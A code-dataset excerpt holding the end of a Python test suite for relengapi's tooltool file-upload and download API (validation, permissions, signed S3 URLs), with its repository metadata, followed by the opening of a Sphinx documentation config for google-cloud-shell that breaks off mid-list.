# sadly, headers are not represented in the URL
eq_(query['AWSAccessKeyId'][0], 'aa')
eq_(int(query['Expires'][0]), time.time() + expires_in)
def assert_batch_response(resp, author='me', message='a batch',
files={}):
eq_(resp.status_code, 200, resp.data)
result = json.loads(resp.data)['result']
eq_(result['author'], author)
# TODO: eq_(result[
eq_(result['message'], message)
eq_(set(result['files']), set(files))
for name, file in files.iteritems():
for k, v in file.iteritems():
eq_(result['files'][name][k], v,
"result['files'][{}][{}] {} != {}".format(
name, k, result['files'][name][k], v))
return result
def assert_batch_row(app, id, author='me', message='a batch', files=[]):
with app.app_context():
tbl = tables.Batch
batch_row = tbl.query.filter(tbl.id == id).first()
eq_(batch_row.author, author)
eq_(batch_row.message, message)
got_files = [(n, f.size, f.sha512, sorted(i.region for i in f.instances))
for n, f in batch_row.files.iteritems()]
eq_(sorted(got_files), sorted(files))
def assert_pending_upload(app, digest, region, expires=None):
with app.app_context():
tbl = tables.File
file = tbl.query.filter(tbl.sha512 == digest).first()
regions = [pu.region for pu in file.pending_uploads]
assert region in regions, regions
if expires:
eq_(pu.expires, expires)
def assert_no_upload_rows(app):
with app.app_context():
eq_(tables.Batch.query.all(), [])
eq_(tables.PendingUpload.query.all(), [])
def assert_file_response(resp, content, visibility='public', instances=['us-east-1']):
eq_(resp.status_code, 200)
exp = {
"algorithm": "sha512",
"digest": hashlib.sha512(content).hexdigest(),
"size": len(content),
"visibility": visibility,
'instances': instances,
"has_instances": any(instances),
}
eq_(json.loads(resp.data)['result'], exp, resp.data)
def do_patch(client, algo, digest, ops):
return client.open(method='PATCH',
path='/tooltool/file/sha512/{}'.format(digest),
headers=[('Content-Type', 'application/json')],
data=json.dumps(ops))
# tests
def test_is_valid_sha512():
"""is_valid_sha512 recgnizes valid digests and rejects others"""
assert tooltool.is_valid_sha512(ONE_DIGEST)
assert tooltool.is_valid_sha512(TWO_DIGEST)
assert not tooltool.is_valid_sha512(ONE_DIGEST[-1])
assert not tooltool.is_valid_sha512(ONE_DIGEST + 'a')
assert not tooltool.is_valid_sha512('a' + ONE_DIGEST)
assert not tooltool.is_valid_sha512('j' * 128)
@test_context
def test_ui(client):
"""The root of the blueprint renders an angular HTML page"""
assert 'angular' in client.get('/tooltool/').data
@moto.mock_s3
@test_context
def test_upload_batch_empty_message(app, client):
"""A POST to /upload with an empty message is rejected."""
batch = mkbatch()
batch['message'] = ''
resp = upload_batch(client, batch)
eq_(resp.status_code, 400)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context
def test_upload_batch_author(app, client):
"""A POST to /upload with an author is rejected."""
batch = mkbatch()
batch['author'] = 'me' # matches authentication
resp = upload_batch(client, batch)
eq_(resp.status_code, 400)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context.specialize(user=NoEmailUser())
def test_upload_batch_no_user(app, client):
"""A POST to /upload with non-user-associated authentication succeeds,
using the string form of the token as author"""
batch = mkbatch()
resp = upload_batch(client, batch)
eq_(resp.status_code, 200)
assert_batch_response(resp, author='no-email:sorry', files={
'one': {'algorithm': 'sha512',
'size': len(ONE),
'digest': ONE_DIGEST}})
@moto.mock_s3
@test_context
def test_upload_batch_empty_files(app, client):
"""A POST to /upload with no files is rejected."""
batch = mkbatch()
batch['files'] = {}
resp = upload_batch(client, batch)
eq_(resp.status_code, 400)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context
def test_upload_batch_bad_algo(app, client):
"""A POST to /upload with an algorithm that is not sha512 is rejected."""
batch = mkbatch()
batch['files']['one']['algorithm'] = 'md4'
resp = upload_batch(client, batch)
eq_(resp.status_code, 400)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context
def test_upload_batch_bad_digest(app, client):
"""A POST to /upload with a bad sha512 digest is rejected."""
batch = mkbatch()
batch['files']['one']['digest'] = 'x' * 128
resp = upload_batch(client, batch)
eq_(resp.status_code, 400)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context
def test_upload_batch_bad_size(app, client):
"""A POST to /upload with a file with the same digest and a different length
is rejected"""
batch = mkbatch()
batch['files']['one']['size'] *= 2 # that ain't right!
add_file_to_db(app, ONE)
resp = upload_batch(client, batch)
eq_(resp.status_code, 400)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context.specialize(user=userperms([]))
def test_upload_batch_no_permissions(app, client):
"""A POST to /upload of a public file without permission to upload fails
with 403."""
batch = mkbatch()
add_file_to_db(app, ONE)
resp = upload_batch(client, batch)
eq_(resp.status_code, 403, resp.data)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context
def test_upload_batch_mixed_visibility_no_permissions(app, client):
"""A POST to /upload of public and internal files fails with 403 if the
user only has permission to upload public files."""
batch = mkbatch()
batch['files']['two'] = {
'algorithm': 'sha512',
'size': len(TWO),
'digest': TWO_DIGEST,
'visibility': 'internal',
}
add_file_to_db(app, ONE)
resp = upload_batch(client, batch)
eq_(resp.status_code, 403, resp.data)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context
def test_upload_batch_no_visibility(app, client):
"""If no visibility is supplied for a file in a batch, the request is
invalid (400)"""
# note that it's WSME that enforces this validity
batch = mkbatch()
del batch['files']['one']['visibility']
resp = upload_batch(client, batch)
eq_(resp.status_code, 400, resp.data)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context
def test_upload_batch_success_fresh(client, app):
"""A POST to /upload with a good batch succeeds, returns signed URLs expiring
in one hour, and inserts the new batch into the DB with links to files, but
no instances, and inserts a pending upload row."""
batch = mkbatch()
with set_time():
with not_so_random_choice():
resp = upload_batch(client, batch)
result = assert_batch_response(resp, files={
'one': {'algorithm': 'sha512',
'size': len(ONE),
'digest': ONE_DIGEST}})
assert_signed_url(result['files']['one']['put_url'], ONE_DIGEST,
method='PUT', expires_in=60)
assert_batch_row(
app, result['id'], files=[('one', len(ONE), ONE_DIGEST, [])])
assert_pending_upload(app, ONE_DIGEST, 'us-east-1')
@moto.mock_s3
@test_context
def test_upload_batch_success_existing_pending_upload(client, app):
"""A successful POST to /upload updates the 'expires' column of any relevant
pending uploads."""
with set_time(NOW - 30):
add_file_to_db(app, ONE, regions=[], pending_regions=['us-east-1'])
batch = mkbatch()
with set_time():
with not_so_random_choice():
resp = upload_batch(client, batch)
result = assert_batch_response(resp, files={
'one': {'algorithm': 'sha512',
'size': len(ONE),
'digest': ONE_DIGEST}})
assert_signed_url(result['files']['one']['put_url'], ONE_DIGEST,
method='PUT', expires_in=60)
assert_pending_upload(
app, ONE_DIGEST, 'us-east-1',
expires=relengapi_time.now() + datetime.timedelta(seconds=60))
assert_batch_row(
app, result['id'], files=[('one', len(ONE), ONE_DIGEST, [])])
@moto.mock_s3
@test_context
def test_upload_batch_success_no_instances(client, app):
"""A POST to /upload with a batch containing a file that already exists, but
has no instances, succeeds, returns signed URLs expiring in one hour,
inserts the new batch into the DB with links to files, but no instances,
and inserts a pending upload row. This could occur when, for example,
re-trying a failed upload."""
batch = mkbatch()
add_file_to_db(app, ONE, regions=[])
with set_time():
with not_so_random_choice():
resp = upload_batch(client, batch)
result = assert_batch_response(resp, files={
'one': {'algorithm': 'sha512',
'size': len(ONE),
'digest': ONE_DIGEST}})
assert_signed_url(result['files']['one']['put_url'], ONE_DIGEST,
method='PUT', expires_in=60)
assert_batch_row(
app, result['id'], files=[('one', len(ONE), ONE_DIGEST, [])])
assert_pending_upload(app, ONE_DIGEST, 'us-east-1')
@moto.mock_s3
@test_context
def test_upload_batch_success_some_existing_files(client, app):
"""A POST to /upload with a good batch containing some files already present
succeeds, returns signed URLs expiring in one hour, and inserts the new
batch into the DB with links to files, but no instances. Also, the
``region`` query parameter selects a preferred region."""
batch = mkbatch()
batch['files']['two'] = {
'algorithm': 'sha512',
'size': len(TWO),
'digest': TWO_DIGEST,
'visibility': 'public',
}
# make sure ONE is already in the DB with at least once instance
add_file_to_db(app, ONE, regions=['us-east-1'])
with set_time():
resp = upload_batch(client, batch, region='us-west-2')
result = assert_batch_response(resp, files={
'one': {'algorithm': 'sha512',
'size': len(ONE),
'digest': ONE_DIGEST},
'two': {'algorithm': 'sha512',
'size': len(TWO),
'digest': TWO_DIGEST},
})
# no put_url for the existing file
assert 'put_url' not in result['files']['one']
assert_signed_url(result['files']['two']['put_url'], TWO_DIGEST,
method='PUT', expires_in=60, region='us-west-2')
assert_batch_row(app, result['id'],
files=[
('one', len(ONE), ONE_DIGEST, ['us-east-1']),
('two', len(TWO), TWO_DIGEST, []),
])
assert_pending_upload(app, TWO_DIGEST, 'us-west-2')
@test_context
def test_upload_change_visibility(client, app):
"""Uploading a file that already exists with a different visibility level
fails with 400, even if there are no instances."""
batch = mkbatch()
batch['files']['one']['visibility'] = 'public'
add_file_to_db(app, ONE, regions=[], visibility='internal')
with set_time():
resp = upload_batch(client, batch, region='us-west-2')
eq_(resp.status_code, 400, resp.data)
assert_no_upload_rows(app)
@test_context
def test_upload_complete(client, app):
"""GET /upload/complete/<digest> when the pending upload has expired causes
a delayed call to check_file_pending_uploads and returns 202"""
with mock.patch('relengapi.blueprints.tooltool.grooming.check_file_pending_uploads') as cfpu:
with set_time(NOW - tooltool.UPLOAD_EXPIRES_IN - 1):
add_file_to_db(app, ONE, regions=[], pending_regions=['us-east-1'])
with set_time(NOW):
resp = client.get('/tooltool/upload/complete/sha512/{}'.format(ONE_DIGEST))
eq_(resp.status_code, 202, resp.data)
cfpu.delay.assert_called_with(ONE_DIGEST)
@test_context
def test_upload_complete_not_expired(client, app):
"""GET /upload/complete/<digest> when the pending upload has not expired returns
409 with a header giving the time until expiration."""
with mock.patch('relengapi.blueprints.tooltool.grooming.check_file_pending_uploads') as cfpu:
with set_time(NOW - tooltool.UPLOAD_EXPIRES_IN + 5):
add_file_to_db(app, ONE, regions=[], pending_regions=['us-east-1'])
with set_time(NOW):
resp = client.get('/tooltool/upload/complete/sha512/{}'.format(ONE_DIGEST))
eq_(resp.status_code, 409, resp.data)
eq_(resp.headers.get('x-retry-after'), '6') # 5 seconds + 1
eq_(cfpu.delay.mock_calls, [])
@test_context
def test_upload_complete_bad_digest(client, app):
"""GET /upload/complete/<digest> with a bad digest returns 400"""
with mock.patch('relengapi.blueprints.tooltool.grooming.check_file_pending_uploads') as cfpu:
resp = client.get('/tooltool/upload/complete/sha512/xyz')
eq_(resp.status_code, 400, resp.data)
cfpu.delay.assert_has_calls([])
@moto.mock_s3
@test_context
def test_download_file_no_such(app, client):
"""Getting /sha512/<digest> for a file that does not exist returns 404"""
resp = client.get('/tooltool/sha512/{}'.format(ONE_DIGEST))
eq_(resp.status_code, 404)
@moto.mock_s3
@test_context
def test_download_file_invalid_digest(app, client):
"""Getting /sha512/<digest> for an invalid digest returns 400"""
resp = client.get('/tooltool/sha512/abcd')
eq_(resp.status_code, 400)
@moto.mock_s3
@test_context
def test_download_file_no_instances(app, client):
"""Getting /sha512/<digest> for a file that exists but has no instances
returns 404"""
add_file_to_db(app, ONE, regions=[])
resp = client.get('/tooltool/sha512/{}'.format(ONE_DIGEST))
eq_(resp.status_code, 404)
@moto.mock_s3
@test_context
def test_download_file_no_permission(app, client):
"""Getting /sha512/<digest> for a file with a visibility the user doesn't
have permission for returns 404."""
add_file_to_db(app, ONE, visibility='internal')
resp = client.get('/tooltool/sha512/{}'.format(ONE_DIGEST))
eq_(resp.status_code, 403)
@moto.mock_s3
@test_context
def test_download_file_exists(app, client):
"""Getting /sha512/<digest> for an exisitng file returns a 302 redirect to
a signed URL in a region where it exists."""
add_file_to_db(app, ONE, regions=['us-west-2', 'us-east-1'])
with set_time():
with not_so_random_choice():
resp = client.get('/tooltool/sha512/{}'.format(ONE_DIGEST))
assert_signed_302(resp, ONE_DIGEST, region='us-east-1')
@moto.mock_s3
@test_context.specialize(user=None)
def test_download_file_anonymous_forbidden(app, client):
"""Anonymously downloading a public file is forbidden if
TOOLTOOL_ALLOW_ANONYMOUS_PUBLIC_DOWNLOAD is not set"""
add_file_to_db(app, ONE, regions=['us-west-2'], visibility='public')
resp = client.get('/tooltool/sha512/{}'.format(ONE_DIGEST))
eq_(resp.status_code, 403)
@moto.mock_s3
@test_context.specialize(user=None, config=allow_anon_cfg)
def test_download_file_anonymous_nonpublic_forbidden(app, client):
"""Anonymously downloading an i nternal file is forbidden even if
TOOLTOOL_ALLOW_ANONYMOUS_PUBLIC_DOWNLOAD is set"""
add_file_to_db(app, ONE, regions=['us-west-2'], visibility='internal')
resp = client.get('/tooltool/sha512/{}'.format(ONE_DIGEST))
eq_(resp.status_code, 403)
@moto.mock_s3
@test_context.specialize(user=None, config=allow_anon_cfg)
def test_download_file_anonymous_allowed(app, client):
"""Anonymously downloading a public file is allowed if
TOOLTOOL_ALLOW_ANONYMOUS_PUBLIC_DOWNLOAD is set"""
add_file_to_db(app, ONE, regions=['us-west-2'], visibility='public')
resp = client.get('/tooltool/sha512/{}'.format(ONE_DIGEST))
eq_(resp.status_code, 302)
@moto.mock_s3
@test_context
def test_download_file_exists_not_in_preferred_region(app, client):
"""Getting /sha512/<digest>?region=.. for an exisitng file that does not
exist in the requested region returns a signed URL for a region where the
file does exist."""
add_file_to_db(app, ONE, regions=['us-west-2'])
with set_time():
resp = client.get(
'/tooltool/sha512/{}?region=us-east-1'.format(ONE_DIGEST))
assert_signed_302(resp, ONE_DIGEST, region='us-west-2')
@moto.mock_s3
@test_context
def test_download_file_exists_region_choice(app, client):
"""Getting /sha512/<digest> for an exisitng file returns a 302 redirect to
a signed URL in the region where it exists."""
add_file_to_db(app, ONE, regions=['us-west-2', 'us-east-1'])
with set_time():
resp = client.get(
'/tooltool/sha512/{}?region=us-west-2'.format(ONE_DIGEST))
assert_signed_302(resp, ONE_DIGEST, region='us-west-2')
@moto.mock_s3
@test_context
def test_search_batches(app, client):
with set_time():
f1 = add_file_to_db(app, ONE)
f1j = {
"algorithm": "sha512",
"digest": ONE_DIGEST,
"size": len(ONE),
"visibility": "public",
"has_instances": True,
}
f2 = add_file_to_db(app, TWO)
f2j = {
"algorithm": "sha512",
"digest": TWO_DIGEST,
"size": len(TWO),
"visibility": "public",
"has_instances": True,
}
add_batch_to_db(
app, 'me@me.com', 'first batch', {'one': f1})
b1j = {
"author": "me@me.com",
"uploaded": "2015-03-05T22:02:02+00:00",
"files": {"one": f1j},
"id": 1,
"message": "first batch"
}
add_batch_to_db(
app, 'me@me.com', 'second batch', {'two': f2})
b2j = {
"author": "me@me.com",
"uploaded": "2015-03-05T22:02:02+00:00",
"files": {"two": f2j},
"id": 2,
"message": "second batch"
}
add_batch_to_db(
app, 'you@you.com', 'third batch', {'1': f1, '2': f2})
b3j = {
"author": "you@you.com",
"uploaded": "2015-03-05T22:02:02+00:00",
"files": {"1": f1j, "2": f2j},
"id": 3,
"message": "third batch"
}
for q, exp_batches in [
('me', [b1j, b2j]),
('ou@y', [b3j]),
('econd batc', [b2j]),
('', [b1j, b2j, b3j]),
]:
resp = client.get('/tooltool/upload?q=' + q)
eq_(resp.status_code, 200, resp.data)
eq_(sorted(json.loads(resp.data)['result']), sorted(exp_batches),
"got: {}\nexp: {}".format(resp.data, exp_batches))
@moto.mock_s3
@test_context
def test_get_batch_not_found(client):
resp = client.get('/tooltool/upload/99')
eq_(resp.status_code, 404, resp.data)
@moto.mock_s3
@test_context
def test_get_batch_found(client):
batch = mkbatch()
batch['files']['two'] = {
'algorithm': 'sha512',
'size': len(TWO),
'digest': TWO_DIGEST,
'visibility': 'public',
}
with set_time():
resp = upload_batch(client, batch)
eq_(resp.status_code, 200, resp.data)
resp = client.get('/tooltool/upload/1')
eq_(resp.status_code, 200, resp.data)
eq_(json.loads(resp.data)['result'], {
"author": "me",
"uploaded": "2015-03-05T22:02:02+00:00",
"files": {
"one": {
"algorithm": "sha512",
"digest": ONE_DIGEST,
"size": len(ONE),
"visibility": "public",
"has_instances": False,
},
"two": {
"algorithm": "sha512",
"digest": TWO_DIGEST,
"size": len(TWO),
"visibility": "public",
"has_instances": False,
}
},
"id": 1,
"message": "a batch"
}, resp.data)
@test_context
def test_get_files(app, client):
"""GETs to /file?q=.. return appropriately filtered files."""
f1 = add_file_to_db(app, ONE)
f1j = {
"algorithm": "sha512",
"digest": ONE_DIGEST,
"size": len(ONE),
"visibility": "public",
"has_instances": True,
}
f2 = add_file_to_db(app, TWO)
f2j = {
"algorithm": "sha512",
"digest": TWO_DIGEST,
"size": len(TWO),
"visibility": "public",
"has_instances": True,
}
add_batch_to_db(
app, 'me@me.com', 'first batch', {'one': f1})
add_batch_to_db(
app, 'me@me.com', 'second batch', {'two': f2})
add_batch_to_db(
app, 'you@you.com', 'third batch', {'1': f1, '2': f2})
for q, exp_files in [
('one', [f1j]),
('2', [f2j]),
(ONE_DIGEST[:8], [f1j]),
(ONE_DIGEST[10:20], []), # digests are prefix-only
('', [f1j, f2j]),
]:
resp = client.get('/tooltool/file?q=' + q)
eq_(resp.status_code, 200)
eq_(sorted(json.loads(resp.data)['result']), sorted(exp_files))
@test_context
def test_get_file_bad_algo(client):
"""A GET to /file/<algo>/<digest> with an unknown algorithm fails with 404"""
eq_(client.get('/tooltool/file/md4/abcd').status_code, 404)
@test_context
def test_get_file_not_found(client):
"""A GET to /file/sha512/<digest> with an unknown digest fails with 404"""
eq_(client.get(
'/tooltool/file/sha512/{}'.format(ONE_DIGEST)).status_code, 404)
@test_context
def test_get_file_success(app, client):
"""A GET to /file/sha512/<digest> with an known digest returns the file"""
add_file_to_db(app, ONE)
resp = client.get('/tooltool/file/sha512/{}'.format(ONE_DIGEST))
assert_file_response(resp, ONE)
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_patch_no_such(app, client):
"""A PATCH to /file/<a>/<d> that doesn't exist returns 404."""
resp = do_patch(client, 'sha512', ONE_DIGEST, [{'op': 'delete_instances'}])
eq_(resp.status_code, 404)
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_patch_bad_algo(app, client):
"""A PATCH to /file/<a>/<d> with a bad algorithm returns 404."""
resp = do_patch(client, 'md3', ONE_DIGEST, [{'op': 'delete_instances'}])
eq_(resp.status_code, 404)
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_patch_no_op(app, client):
"""A PATCH to /file/<a>/<d> with change containing no 'op' returns 400."""
add_file_to_db(app, ONE)
resp = do_patch(client, 'sha512', ONE_DIGEST, [{'pop': 'snap'}])
eq_(resp.status_code, 400)
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_patch_bad_op(app, client):
"""A PATCH to /file/<a>/<d> with change containing a bad 'op' returns 400."""
add_file_to_db(app, ONE)
resp = do_patch(client, 'sha512', ONE_DIGEST, [{'op': 'hop'}])
eq_(resp.status_code, 400)
@moto.mock_s3
@test_context
def test_patch_no_perms(app, client):
"""A PATCH to /file/<a>/<d> without tooltool.manage fails with 403"""
add_file_to_db(app, ONE, regions=['us-east-1'])
resp = do_patch(client, 'sha512', ONE_DIGEST, [{'op': 'delete_instances'}])
eq_(resp.status_code, 403)
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_delete_instances_success_no_instances(app, client):
"""A PATCH with op=delete_instances succeeds when there are no instances."""
add_file_to_db(app, ONE, regions=[])
resp = do_patch(client, 'sha512', ONE_DIGEST, [{'op': 'delete_instances'}])
assert_file_response(resp, ONE, instances=[])
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_delete_instances_success(app, client):
"""A PATCH with op=delete_instances deletes its instances."""
add_file_to_db(app, ONE, regions=['us-east-1'])
add_file_to_s3(app, ONE, region='us-east-1')
resp = do_patch(client, 'sha512', ONE_DIGEST, [{'op': 'delete_instances'}])
assert_file_response(resp, ONE, instances=[])
with app.app_context():
# ensure instances are gone from the DB
f = tables.File.query.first()
eq_(f.instances, [])
# and from S3
conn = app.aws.connect_to('s3', 'us-east-1')
key = conn.get_bucket(
'tt-use1').get_key(util.keyname(ONE_DIGEST))
assert not key, "key still exists"
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_set_visibility_invalid_vis(app, client):
"""A PATCH with op=set_visibility and an invalid visibility fails."""
add_file_to_db(app, ONE, regions=[])
resp = do_patch(client, 'sha512', ONE_DIGEST,
[{'op': 'set_visibility', 'visibility': '5-eyes'}])
eq_(resp.status_code, 400)
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_set_visibility_success(app, client):
"""A PATCH with op=set_visibility updates the file's visibility."""
add_file_to_db(app, ONE, visibility='public')
resp = do_patch(client, 'sha512', ONE_DIGEST,
[{'op': 'set_visibility', 'visibility': 'internal'}])
assert_file_response(resp, ONE, visibility='internal')
with app.app_context():
f = tables.File.query.first()
eq_(f.visibility, 'internal')
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_set_visibility_success_no_change(app, client):
"""A PATCH with op=set_visibility with the existing visibility succeeds."""
add_file_to_db(app, ONE, visibility='internal')
resp = do_patch(client, 'sha512', ONE_DIGEST,
[{'op': 'set_visibility', 'visibility': 'internal'}])
assert_file_response(resp, ONE, visibility='internal')
with app.app_context():
f = tables.File.query.first()
eq_(f.visibility, 'internal')
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_multi_op_patch(app, client):
"""A PATCH with multiple ops performs all of them."""
add_file_to_db(
app, ONE, visibility='internal', regions=['us-east-1', 'us-west-2'])
add_file_to_s3(app, ONE, region='us-east-1')
add_file_to_s3(app, ONE, region='us-west-2')
resp = do_patch(client, 'sha512', ONE_DIGEST, [
{'op': 'set_visibility', 'visibility': 'public'},
{'op': 'delete_instances'},
])
assert_file_response(resp, ONE, visibility='public', instances=[])
with app.app_context():
f = tables.File.query.first()
eq_(f.visibility, 'public')
eq_(f.instances, [])
|
hwine/build-relengapi
|
relengapi/blueprints/tooltool/test_tooltool.py
|
Python
|
mpl-2.0
| 32,335 | 0.000526 |
# -*- coding: utf-8 -*-
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# google-cloud-shell documentation build configuration file
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(".."))
# For plugins that can not read conf.py.
# See also: https://github.com/docascode/sphinx-docfx-yaml/issues/85
sys.path.insert(0, os.path.abspath("."))
__version__ = ""
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = "1.5.5"
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.intersphinx",
"sphinx.ext.coverage",
"sphinx.ext.doctest",
"sphinx.ext.napoleon",
"sphinx.ext.todo",
"sphinx.ext.viewcode",
"recommonmark",
]
# autodoc/autosummary flags
autoclass_content = "both"
autodoc_default_options = {"members": True}
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = [".rst", ".md"]
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The root toctree document.
root_doc = "index"
# General information about the project.
project = "google-cloud-shell"
copyright = "2019, Google"
author = "Google APIs"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
release = __version__
# The short X.Y version.
version = ".".join(release.split(".")[0:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
"_build",
"**/.nox/**/*",
"samples/AUTHORING_GUIDE.md",
"samples/CONTRIBUTING.md",
"samples/snippets/README.rst",
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "alabaster"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
"description": "Google Cloud Client Libraries for google-cloud-shell",
"github_user": "googleapis",
"github_repo": "python-shell",
"github_banner": True,
"font_family": "'Roboto', Georgia, sans",
"head_font_family": "'Roboto', Georgia, serif",
"code_font_family": "'Roboto Mono', 'Consolas', monospace",
}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = "google-cloud-shell-doc"
# -- Options for warnings ------------------------------------------------------
suppress_warnings = [
# Temporarily suppress this to avoid "more than one target found for
# cross-reference" warning, which are intractable for us to avoid while in
# a mono-repo.
# See https://github.com/sphinx-doc/sphinx/blob
# /2a65ffeef5c107c19084fabdd706cdff3f52d93c/sphinx/domains/python.py#L843
"ref.python"
]
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
root_doc,
"google-cloud-shell.tex",
"google-cloud-shell Documentation",
author,
"manual",
)
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(root_doc, "google-cloud-shell", "google-cloud-shell Documentation", [author], 1,)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
root_doc,
"google-cloud-shell",
"google-cloud-shell Documentation",
author,
"google-cloud-shell",
"google-cloud-shell Library",
"APIs",
